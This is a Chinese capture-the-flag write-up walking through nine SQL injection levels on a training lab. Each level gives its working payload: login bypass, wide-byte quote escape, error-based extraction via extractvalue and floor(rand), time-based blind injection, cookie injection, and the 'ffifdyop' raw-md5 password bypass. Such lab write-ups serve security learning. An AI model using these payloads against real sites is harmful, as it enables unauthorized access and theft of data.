网络安全实验室CTF-注入关

注入关

1

用万能密钥登陆即可

payload

用户名：admin' or 1'='1

密码随便

2

看了下注释，里面有提示参数是id

试了下id=1 or 1=1 就拿到flag了 = =

3

试了好多都没有回显，最后宽字节ok%df%27or 1=1 --+

正常步骤就可以拿到flag

4

看到url里有两个参数start和num

在start参数后加引号，有报错

看报错内容，发现在存在addslash函数，尝试发现SQL语句没有用引号包围

有limit，所以使用procedure analyse和extractvalue报错

payloadprocedure analyse(extractvalue(0x7e,concat(0x7e,version())),1)

不能用引号，所以xxx_name要用hex编码

剩下的就是正常步骤

5

= =！帅哥是狗？？？

看了下注释，有id=1，应该是注入点

试了半天没报错，布尔延时也试了，没作用

。。。丢给sqlmap跑也没结果，看了wp，id不是注入点

注入点在图片链接里，要用burp抓包才能看到返回值http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''dog1.jpg運''' at line 1<br />
<b>Warning</b>: mysql_fetch_row() expects parameter 1 to be resource, boolean given in <b>sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/myimages1.php</b> on line <b>18</b><br />

后边就是正常步骤了（注释可以用--+）

6

这题告诉了说要用报错注入，先尝试'报错

然后用floor报错语句即可

and (select 1 from (select count(*), concat(database(), floor(rand(0)*2))x from information_schema.tables group by x)a)

7

题目说了是盲注

?username=admin' and if(database(),1,sleep(5))--+

延迟了5秒，然后用ascii(substr((select xxx from xxx),1,1))=x

写脚本 / sqlmap即可

8

找了半天没找到注入点，放到sqlmap跑也没结果，看了wp说注入点在cookie = =

剩下的就是正常做法了cookie:id=1 or 1=1

9

这道题还是不会，看了wp

收获了一个比较神奇的md5

md5("ffifdyop")=276f722736c95d99e921722cf9ed621c

md5("ffifdyop",TRUE)='or'6É]™é!r,ùíb

这里的'or'xxxxx就可以绕过password的查询

payload?id=1&pwd=ffifdyop